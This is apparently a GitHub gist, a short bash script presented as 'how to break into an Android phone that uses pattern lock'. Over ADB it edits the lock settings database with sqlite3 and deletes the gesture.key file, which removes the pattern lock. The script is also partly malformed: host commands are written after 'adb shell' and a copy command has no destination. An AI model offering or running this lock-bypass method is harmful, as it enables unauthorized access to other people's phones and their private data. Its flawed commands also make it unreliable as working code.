Created
February 4, 2014 02:03
-
-
Save cmbaughman/8796228 to your computer and use it in GitHub Desktop.
How to break into an Android phone that uses pattern lock...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
adb shell | |
cp /data/data/com.android.providers.settings/databases | |
sqlite3 settings.db | |
update system set value=0 where name='lock_pattern_autolock' | |
update system set value=0 where name='lockscreen.lockedoutpermanently' | |
#It's good to include this part too. | |
adb shell rm -f /data/system/gesture.key |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment